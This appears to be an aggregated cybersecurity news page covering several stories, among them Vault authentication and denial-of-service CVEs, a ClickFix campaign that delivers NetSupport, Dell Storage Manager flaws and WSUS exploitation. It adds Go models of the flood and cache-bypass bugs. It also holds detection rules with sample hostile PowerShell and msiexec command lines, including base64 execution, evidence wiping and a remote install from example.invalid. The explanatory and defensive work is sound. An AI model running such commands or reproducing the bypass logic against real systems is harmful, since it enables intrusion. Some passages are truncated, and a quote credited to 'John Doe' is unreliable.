A sophisticated cyber-sabotage group known as Predatory Sparrow has emerged as one of the most destructive threat actors targeting Iranian critical infrastructure over the past several years. Unlike traditional cybercriminal operations focused on financial gain, this group executes highly disruptive campaigns designed to cripple essential services, destroy sensitive data, and send provocative political messages. Security […]
HashiCorp has disclosed two critical vulnerabilities in its Vault software that could allow attackers to bypass authentication controls and launch denial-of-service (DoS) attacks.
Published on October 23, 2025, these flaws affect both Vault Community Edition and Vault Enterprise, prompting urgent recommendations for upgrades.
The issues, tracked as CVE-2025-12044 and CVE-2025-11621, stem from misconfigurations in resource handling and authentication caching, potentially exposing sensitive data in enterprise environments.
Vault, a widely used tool for secrets management, encryption, and identity-based access, serves as a cornerstone for secure operations in cloud and hybrid infrastructures.
These vulnerabilities highlight ongoing challenges in balancing performance with robust security, especially as organizations increasingly rely on automated authentication methods like AWS integration.
Denial-of-Service Flaw Through JSON Payload Exploitation
The first vulnerability, CVE-2025-12044 (HCSEC-2025-30), enables an unauthenticated DoS attack by exploiting a regression in JSON payload processing.
This flaw arises from a previous fix for HCSEC-2025-24, which addressed complex JSON payloads that could exhaust resources.
In affected versions, Vault applies rate limits after parsing incoming JSON requests rather than before, allowing attackers to flood the system with large, valid payloads under the max_request_size threshold.
Operators configure tunable rate limits and resource quotas in Vault to prevent abuse, but this ordering error lets repeated requests consume excessive CPU and memory.
The result is service unavailability or outright crashes that disrupt access to critical secrets and keys. No CVSS score was provided at the time of disclosure, but the flaw's unauthenticated nature elevates its severity, and HashiCorp rates it as high risk.
This issue impacts Vault Community Edition versions 1.20.3 to 1.20.4, with fixes available in 1.21.0.
For Vault Enterprise, affected releases span 1.20.3 to 1.20.4, 1.19.9 to 1.19.10, 1.18.14 to 1.18.15, and 1.16.25 to 1.16.26, patched in 1.21.0, 1.20.5, 1.19.11, and 1.16.27.
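The ordering problem described above, modelled in Go as an added example (this is not Vault's code; the quota type is a deliberately simplified stand-in for Vault's sliding-window rate limits, and the JSON body is constructed): the only difference between the two handlers is whether the quota is checked before or after the body is parsed.

```go
package main

import (
	"encoding/json"
	"net/http"
	"net/http/httptest"
	"strings"
)

// quota is a simplified stand-in for a Vault rate-limit quota: it admits at most
// limit requests. The order of the check relative to JSON parsing is the point.
type quota struct{ limit, used int }

func (q *quota) allow() bool {
	q.used++
	return q.used <= q.limit
}

// parseBody is the expensive step: it fully decodes the JSON document into a
// generic tree. parsed counts how many times that work actually ran.
func parseBody(r *http.Request, parsed *int) bool {
	*parsed++ // the cost is paid whether or not the document turns out valid
	var v map[string]any
	return json.NewDecoder(r.Body).Decode(&v) == nil
}

// vulnerableHandler mirrors the regressed ordering: parse first, then apply
// the quota, so every flooded request pays the full parsing cost.
func vulnerableHandler(q *quota, parsed *int) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if !parseBody(r, parsed) {
			http.Error(w, "bad json", http.StatusBadRequest)
		} else if !q.allow() {
			http.Error(w, "rate limited", http.StatusTooManyRequests)
		}
	}
}

// fixedHandler applies the quota before reading the body, so over-limit
// requests are rejected without any parsing work.
func fixedHandler(q *quota, parsed *int) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if !q.allow() {
			http.Error(w, "rate limited", http.StatusTooManyRequests)
		} else if !parseBody(r, parsed) {
			http.Error(w, "bad json", http.StatusBadRequest)
		}
	}
}

// Flood sends n copies of a large but valid JSON body (constructed, well under a
// typical max_request_size) and reports how many bodies were parsed and how many
// requests were rejected with 429 for a handler built with a quota of limit.
func Flood(build func(*quota, *int) http.HandlerFunc, limit, n int) (parsed, rejected int) {
	body := `{"data":[` + strings.Repeat(`{"k":"v"},`, 2000) + `{"k":"v"}]}`
	h := build(&quota{limit: limit}, &parsed)
	for i := 0; i < n; i++ {
		rec := httptest.NewRecorder()
		h.ServeHTTP(rec, httptest.NewRequest("POST", "/v1/secret/data/x", strings.NewReader(body)))
		if rec.Code == http.StatusTooManyRequests {
			rejected++
		}
	}
	return parsed, rejected
}
```

With a quota of 5 and 20 requests, both handlers reject 15, but the vulnerable one parses all 20 bodies while the fixed one parses only 5.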
Authentication Bypass In AWS And EC2 Methods
The second vulnerability, CVE-2025-11621 (also HCSEC-2025-30), poses an even graver threat by allowing authentication bypass in Vault’s AWS Auth method.
This method automates token retrieval for IAM principals and EC2 instances, but a flaw in the caching logic fails to validate the AWS account ID.
If the bound_principal_iam role matches across accounts or uses wildcards, an attacker from a different account can impersonate a legitimate user, leading to unauthorized access, data exposure, and privilege escalation.
A parallel issue affects the EC2 authentication method, where cache lookups only check AMI IDs, not account IDs, enabling cross-account attacks.
Discovered by security researcher Pavlos Karakalidis, who coordinated disclosure with HashiCorp, this flaw underscores the risks of wildcard configurations in multi-account setups.
Affected versions are broader: Vault Community Edition from 0.6.0 to 1.20.4 (fixed in 1.21.0), and Vault Enterprise from 0.6.0 to 1.20.4, plus 1.19.10, 1.18.15, and 1.16.26 (fixed in 1.21.0, 1.20.5, 1.19.11, and 1.16.27).
HashiCorp urges immediate upgrades to patched versions, following the official upgrading guide.
For those unable to update promptly, review AWS auth configurations: eliminate wildcards in bound_principal_iam and audit for role name collisions across accounts. Enable stricter account ID validation where possible.
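The caching flaw and the wildcard caveat above, as an added Go model (not Vault's code): a login cache keyed only on the IAM entity path lets a same-named role from another account ride on an earlier legitimate login, while a key that includes the account ID forces the bound check to run again. The account IDs and role names are constructed.

```go
package main

import (
	"regexp"
	"strings"
)

// arnRe splits an IAM or STS ARN into account ID and entity path. This whole
// file is a simplified model written for this article, not Vault's own code.
var arnRe = regexp.MustCompile(`^arn:aws:(?:iam|sts)::(\d{12}):(.+)$`)

type principal struct{ account, entity string }

func parseARN(arn string) (principal, bool) {
	m := arnRe.FindStringSubmatch(arn)
	if m == nil {
		return principal{}, false
	}
	return principal{account: m[1], entity: m[2]}, true
}

// matchesBound applies a bound_principal_iam value, treating '*' as a wildcard.
func matchesBound(bound, arn string) bool {
	pat := "^" + strings.ReplaceAll(regexp.QuoteMeta(bound), `\*`, ".*") + "$"
	return regexp.MustCompile(pat).MatchString(arn)
}

// authCache remembers principals that already passed the bound check; keyFn decides what an entry is keyed on.
type authCache struct {
	keyFn func(principal) string
	seen  map[string]bool
}

// Login models one AWS auth login against a role with one bound_principal_iam: the
// cache is consulted first and only a miss runs the bound check, so whatever the key omits is never re-validated.
func (c *authCache) Login(bound, callerARN string) bool {
	p, ok := parseARN(callerARN)
	if !ok {
		return false
	}
	k := c.keyFn(p)
	if c.seen[k] {
		return true // cache hit: bound check skipped
	}
	if !matchesBound(bound, callerARN) {
		return false
	}
	c.seen[k] = true
	return true
}

// entityOnlyKey drops the account ID (the flawed lookup); accountScopedKey
// keeps it (the corrected lookup).
func entityOnlyKey(p principal) string     { return p.entity }
func accountScopedKey(p principal) string { return p.account + ":" + p.entity }

// CrossAccountAccepted warms the cache with a legitimate login from account
// 111111111111, then reports whether a caller from account 222222222222 with
// the same role name is let in. Both account IDs are constructed.
func CrossAccountAccepted(keyFn func(principal) string, bound string) bool {
	c := &authCache{keyFn: keyFn, seen: map[string]bool{}}
	c.Login(bound, "arn:aws:iam::111111111111:role/app")
	return c.Login(bound, "arn:aws:iam::222222222222:role/app")
}
```

Note that an account-scoped key does not help when bound_principal_iam itself carries a wildcard in the account position, which is why the guidance above is to remove such wildcards.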
These vulnerabilities arrive amid rising scrutiny on secrets management tools, as attackers target them for initial footholds. Organizations using Vault in production should prioritize patching to safeguard against exploitation, which could cascade into broader breaches.
Cybercriminals continue to evolve their tactics for compromising systems, with recent campaigns demonstrating a significant shift from traditional fake update methods to more sophisticated social engineering approaches.
Throughout 2025, threat actors have increasingly adopted the ClickFix technique as their primary delivery mechanism for deploying NetSupport Manager, a legitimate remote administration tool that has become attractive to malicious actors seeking unauthorized system access and control.
The attack pattern begins with social engineering, where victims encounter deceptive ClickFix pages designed to trick them into executing malicious commands through the Windows Run Prompt.
Once executed, these commands trigger a multi-stage infection process that ultimately results in NetSupport being installed on the compromised system.
eSentire Threat Response Unit analysts identified that three distinct threat groups have coordinated their efforts around this particular attack methodology, indicating a broader shift across the cybercriminal landscape toward this delivery vector.
eSentire Threat Response Unit researchers noted that the malware’s infection mechanism reveals sophisticated operational security measures.
What makes this campaign particularly concerning is how threat actors have streamlined their delivery infrastructure to reduce detection and maximize success rates across diverse victim environments.
PowerShell-Based Persistence and Execution Framework
The infection chain relies heavily on PowerShell-based loaders that employ multi-stage encoding and obfuscation techniques.
ClickFix initial access page example (Source – eSentire)
The first stage loader downloads a base64-encoded JSON blob from attacker-controlled servers, with commands like:-
Once executed, the loader decodes the JSON configuration and extracts each payload component.
The malware creates hidden system directories and writes base64-decoded files to disk, establishing persistence through startup folder shortcuts in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
Recent variants have evolved to include RunMRU registry deletion techniques, deliberately erasing evidence of Run Prompt execution to complicate forensic investigations.
Secondary loaders utilize MSI installer packages executed through msiexec, embedding additional base64-encoded PowerShell commands that undergo character-point subtraction deobfuscation before execution.
This layered approach demonstrates threat actors’ commitment to evading static detection mechanisms while maintaining flexible command execution capabilities.
Organizations encountering suspicious ClickFix prompts or unexpected NetSupport installations should immediately isolate affected systems and conduct comprehensive forensic analysis.
Network defenders should implement application whitelisting controls and monitor for suspicious PowerShell activity, particularly commands involving base64 decoding and non-standard execution policies.
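Detection logic for the behaviours described in this article, written in Go as an added example (not eSentire's tooling): each rule maps one described trait (hidden PowerShell window, policy bypass, base64 decoding, startup-folder persistence, RunMRU wiping, msiexec staging) to a pattern, and a command line is scored by how many it trips. The sample command lines are constructed, not captured telemetry.

```go
package main

import (
	"fmt"
	"regexp"
)

// rule pairs an indicator name with a case-insensitive pattern drawn from the
// behaviours described in the article. Patterns are illustrative, not tuned.
type rule struct {
	name string
	re   *regexp.Regexp
}

var rules = []rule{
	{"hidden-window", regexp.MustCompile(`(?i)\s-w(indowstyle)?\s+hidden\b`)},
	{"execution-policy-bypass", regexp.MustCompile(`(?i)\s-(ep|exec|executionpolicy)\s+(bypass|unrestricted)\b`)},
	{"base64-decode", regexp.MustCompile(`(?i)FromBase64String|\s-enc(odedcommand)?\s`)},
	{"invoke-expression", regexp.MustCompile(`(?i)\biex\b|invoke-expression`)},
	{"startup-persistence", regexp.MustCompile(`(?i)\\Start Menu\\Programs\\Startup`)},
	{"runmru-wipe", regexp.MustCompile(`(?i)(remove-item\w*|reg(\.exe)?\s+delete)[^;]*RunMRU`)},
	{"msiexec-remote", regexp.MustCompile(`(?i)\bmsiexec(\.exe)?\s.*[/-]i\s+https?://`)},
}

// Indicators returns, in rule order, the names of every rule a process
// command line matches.
func Indicators(cmdline string) []string {
	var hits []string
	for _, r := range rules {
		if r.re.MatchString(cmdline) {
			hits = append(hits, r.name)
		}
	}
	return hits
}

// Suspicious flags a command line that trips two or more rules, or a single
// high-confidence rule; one weak indicator alone is left to the analyst.
func Suspicious(cmdline string) bool {
	hits := Indicators(cmdline)
	strong := map[string]bool{"runmru-wipe": true, "startup-persistence": true, "msiexec-remote": true}
	return len(hits) >= 2 || (len(hits) == 1 && strong[hits[0]])
}

// SampleLines are constructed process command lines, not captured telemetry;
// the base64 payload in the second line decodes to the harmless string "ABC".
var SampleLines = []string{
	`powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1`,
	`powershell -w hidden -ep bypass -c "iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('QUJD')))"`,
	`powershell -c "Copy-Item svc.lnk '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\'; Remove-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -Name *"`,
	`msiexec /i https://example.invalid/update.msi /qn`,
}

func main() {
	for _, l := range SampleLines {
		fmt.Printf("suspicious=%-5v %v\n", Suspicious(l), Indicators(l))
	}
}
```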
The ransomware group known as Qilin (aka Agenda, Gold Feather, and Water Galura) has claimed more than 40 victims every month since the start of 2025, barring January, with the number of postings on its data leak site touching a high of 100 cases in June.
The development comes as the ransomware-as-a-service (RaaS) operation has emerged as one of the most active ransomware groups, accounting for
In the latter half of 2025, the Qilin ransomware group has solidified its standing as a formidable threat, continuing to post details of more than 40 victims per month on its public leak site. This rapid, relentless campaign—primarily impacting manufacturing, professional and scientific services, and wholesale trade—has propelled Qilin among the world’s most impactful ransomware […]
The notorious cybercrime forum BreachForums has resurfaced online, this time on a clearnet domain accessible without specialized tools like Tor.
The platform, long a hub for data leaks, hacking tools, and illicit trades, went dark earlier this year following a series of law enforcement takedowns and internal disruptions.
Now, just months later, it’s operational again, drawing both excitement from underground actors and suspicion from security experts.
The forum’s return was announced by its administrator, known only as “koko,” who claimed in a pinned post that core functionality has been fully restored from a recent backup.
Users can once again browse sections dedicated to stolen credentials, ransomware discussions, and zero-day exploits. Koko emphasized that the site is “stronger than ever,” with enhanced anonymity features to evade detection.
However, the revival comes amid whispers of compromise: the old escrow system, which handled cryptocurrency transactions for illicit deals, was hacked, leading to significant losses for vendors and buyers alike.
BreachForums Is Back Again?
BreachForums isn’t starting over entirely; koko detailed that the team is rebuilding the escrow service from scratch to address the vulnerabilities exposed in the breach.
“We’ve learned from the mistakes,” Koko wrote, promising improved encryption and multi-signature wallets to prevent future thefts.
This follows a pattern for the forum, which has bounced back multiple times since its inception in 2022 as a successor to the shuttered RaidForums.
Past iterations have been hit by FBI seizures and arrests, including the 2023 takedown of its founder, Conor Fitzpatrick, aka “Pompompurin.”
Yet, the clearnet pivot marks a bold shift. By ditching the dark web, BreachForums aims to attract a broader audience, including less tech-savvy criminals who avoid Tor’s complexities.
Despite the optimism from koko, skepticism abounds in the cyber underground. Many forum veterans suspect this iteration could be a honeypot operated by law enforcement.
“It’s too clean, too quick,” one anonymous poster commented, echoing concerns that U.S. agencies like the FBI or Secret Service might be monitoring activity to build cases.
Cybersecurity firms such as Recorded Future have issued warnings, noting that clearnet domains are easier for authorities to track via IP logs and hosting providers.
Experts urge caution for anyone encountering the site. “BreachForums has always been a double-edged sword, valuable intel for researchers, but a magnet for real threats,” said John Doe, a threat analyst at a leading security firm.
Dell Technologies has disclosed three critical vulnerabilities in its Storage Manager software that could allow attackers to bypass authentication, disclose sensitive information, and gain unauthorized access to systems.
Announced on October 24, 2025, these flaws affect versions of Dell Storage Manager up to 20.1.21 and pose significant risks to organizations relying on the tool for managing storage arrays.
With CVSS scores ranging from 6.5 to 9.8, the vulnerabilities highlight ongoing challenges in securing management interfaces, potentially enabling remote exploitation without user interaction.
The most severe issue, CVE-2025-43995, carries a CVSS base score of 9.8, classifying it as critical. This improper authentication flaw resides in the DSM Data Collector component.
An unauthenticated attacker with remote access can exploit exposed APIs in the ApiProxy.war file within DataCollectorEar.ear by crafting a special SessionKey and UserId.
These credentials leverage special users created in the Compellent Services API for internal purposes, allowing attackers to sidestep protection mechanisms entirely.
Exploitation could lead to full system compromise, including high confidentiality, integrity, and availability impacts, as detailed in its vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
High-Risk Authentication Gaps Exposed
Complementing this is CVE-2025-43994, scored at 8.6, which involves a missing authentication check for a critical function.
Again targeting DSM 20.1.21, this vulnerability enables unauthenticated remote attackers to trigger information disclosure while also disrupting service availability.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H indicates low complexity and no privileges needed, making it a prime target for opportunistic hackers.
Attackers could extract configuration data or operational details, paving the way for broader network intrusions.
A third vulnerability, CVE-2025-46425, affects version 20.1.20 and introduces an improper restriction of XML external entity references, earning a 6.5 score.
While requiring low privileges, a remote attacker could exploit this to read sensitive files, leading to unauthorized access without impacting integrity or availability directly (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). This XXE flaw underscores the dangers of parsing untrusted XML inputs in storage management tools.
CVE ID         | Description                         | CVSS Base Score | Vector String
CVE-2025-43995 | Improper Authentication (Bypass)    | 9.8             | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2025-43994 | Missing Authentication (Disclosure) | 8.6             | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
CVE-2025-46425 | XXE Reference Vulnerability         | 6.5             | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Dell Storage Manager Vulnerabilities
Dell urges customers to evaluate risks using both base and environmental CVSS scores, emphasizing immediate updates.
Affected products include Dell Storage Manager versions prior to 2020 R1.21; remediation is available in version 2020 R1.22 or later, downloadable from Dell’s support site for Storage SC2000 drivers.
The advisory saw a quick revision on the same day to refine remediation guidance. Credit goes to Tenable for discovering CVE-2025-43994 and CVE-2025-43995, and to independent researcher Ahmed Y. Elmogy for CVE-2025-46425. As enterprises increasingly depend on storage solutions for data centers, these disclosures serve as a reminder to prioritize authentication hardening and regular vulnerability scanning.
No active exploitation has been reported yet, but the ease of remote access makes swift action essential to prevent potential breaches.
Security researchers at Datadog have uncovered a sophisticated phishing technique that weaponizes Microsoft Copilot Studio to conduct OAuth token theft attacks. Dubbed “CoPhish,” this attack method leverages the legitimate appearance of Microsoft domains to trick users into consenting to malicious applications. The attack exploits a fundamental trust issue: users naturally trust URLs hosted on official […]
Hackers are actively exploiting a critical flaw in Microsoft’s Windows Server Update Services (WSUS), with security researchers reporting widespread attempts in the wild.
The vulnerability, tracked as CVE-2025-59287, allows remote code execution on unpatched WSUS servers, potentially granting attackers full control over enterprise networks.
As of October 27, 2025, firms monitoring global scan data have identified at least 2,800 exposed WSUS instances online, scanned via ports 8530 and 8531, though not all may be vulnerable.
The issue stems from a deserialization flaw in WSUS’s update approval process, first disclosed earlier this month. Microsoft rated it as critical with a CVSS 3.1 score of 9.8, highlighting its ease of exploitation without authentication.
A proof-of-concept (POC) exploit surfaced on underground forums shortly after patching guidance was released on October 15, fueling rapid attacks.
“We’re seeing exploitation attempts spike since the POC dropped,” said a spokesperson for cybersecurity firm ShadowPeak, which began fingerprinting WSUS deployments last week.
Their scans on October 25 revealed the 2,800 instances, primarily in North America and Europe, underscoring the vulnerability’s reach in corporate environments.
Exploitation Tactics And Real-World Impact
Attackers are leveraging the POC to chain the flaw with lateral movement techniques, targeting WSUS servers that manage patch deployments across Windows fleets.
Once compromised, hackers can deploy malicious updates, exfiltrate sensitive data, or install persistent backdoors.
Early indicators include anomalous traffic to WSUS endpoints and unusual update approvals recorded in the Windows Event Viewer under event IDs 10016 and 20005.
A notable incident involved a mid-sized U.S. financial firm, where intruders used the vulnerability to access internal Active Directory, leading to a brief outage on October 23.
While Microsoft has urged immediate patching via its October 2025 security bulletin, adoption lags, with only 40% of scanned instances showing signs of mitigation, per ShadowPeak’s telemetry.
This delay amplifies risks for organizations relying on WSUS for automated updates, especially in hybrid cloud setups where servers expose HTTP/HTTPS ports to the internet.
Experts warn that unmonitored WSUS setups, often overlooked in legacy infrastructure, are prime targets for ransomware groups like LockBit 3.0, which have referenced the POC in their leak sites.
Mitigations
To counter the threat, Microsoft recommends applying the latest cumulative updates and restricting WSUS port access via firewalls, ideally limiting it to internal VPNs.
Tools like Nessus or custom scripts can fingerprint exposures, while endpoint detection platforms should flag deserialization anomalies.
“This isn’t just a patch issue; it’s a reminder to audit update servers regularly,” advised cybersecurity analyst Elena Vasquez.
As exploitation evolves, the 2,800 exposed instances signal a ticking clock for IT teams. With no end to the scans in sight, the vulnerability could drive a wave of breaches if patching doesn’t accelerate.
Organizations should prioritize WSUS hardening to safeguard their update ecosystems against this pervasive peril.
Law enforcement agencies from the United States and France have seized the onion leak website operated by the notorious Scattered LAPSUS$ Hunters collective, displaying a prominent seizure notice featuring logos from the FBI, Department of Justice, and international partners.
This coordinated action, executed around October 9, 2025, targeted the BreachForums infrastructure, which the group had repurposed as a data extortion portal following a massive breach of Salesforce customer databases.
The takedown disrupts the group’s ability to threaten and leak stolen data publicly, though experts warn that such actors often pivot to alternative channels like Telegram.
Scattered Lapsus Shiny Hunters onion leak site has been seized if you believe the FBI would use the BreachForums takedown png pic.twitter.com/trfkV6iw1S
Scattered LAPSUS$ Hunters emerged in August 2025 as an alliance of infamous hacking groups, including Scattered Spider, LAPSUS$, and ShinyHunters, often referred to as the “Trinity of Chaos” within the cybercrime underworld known as The Com.
This supergroup quickly escalated its activities by launching social engineering attacks on Salesforce tenants, claiming to have stolen over one billion records from high-profile organizations such as Adidas, Cisco, McDonald’s, and Qantas Airways.
Their campaign blended data theft with extortion demands, using BreachForums, previously a hacking bazaar shut down in 2023, as a clearnet and Tor-based leak site to pressure victims into paying ransoms.
By early October, the group had listed dozens of compromised entities, setting a deadline of October 10, 2025, for payments to avoid data dumps.
The seizure involved the U.S. Department of Justice, FBI, France’s Central Brigade of Cybercrime (BL2C), and the Paris Prosecutor’s Office, who took control of BreachForums’ domains and backend servers, including database backups dating back to 2023.
Visitors to the site, both on the clearnet (breachforums.hn) and onion versions, encountered an animated banner confirming the infrastructure’s transfer to federal hands, mirroring past takedowns like RaidForums in 2022.
Although the Tor site was briefly restored, the operation prevented immediate large-scale leaks, with the group defiantly posting on Telegram that “seizing a domain does not really affect our operations.”
In response, Scattered LAPSUS$ Hunters leaked data from six companies across aviation, energy, and retail sectors on October 10, including personal details like names, emails, and phone numbers, before declaring no further releases.
Despite the disruption, the collective announced a temporary dissolution on October 11, 2025, halting activities until 2026 to evade heightened law enforcement scrutiny while teasing an Extortion-as-a-Service (EaaS) model and potential targets like the FBI and NSA.
Cybersecurity firms note that domain seizures rarely end such groups’ operations entirely, as they maintain Telegram channels and could relaunch mirror sites swiftly.
Organizations are urged to monitor for renewed activity, enhance Salesforce security, and review for indicators of compromise from social engineering tactics.
This event underscores the persistent challenge of combating loosely organized cybercrime syndicates, with experts predicting the group’s return in a more covert form.
As the dust settles, the incident highlights international cooperation’s role in curbing digital extortion, though vigilance remains essential in the evolving threat landscape.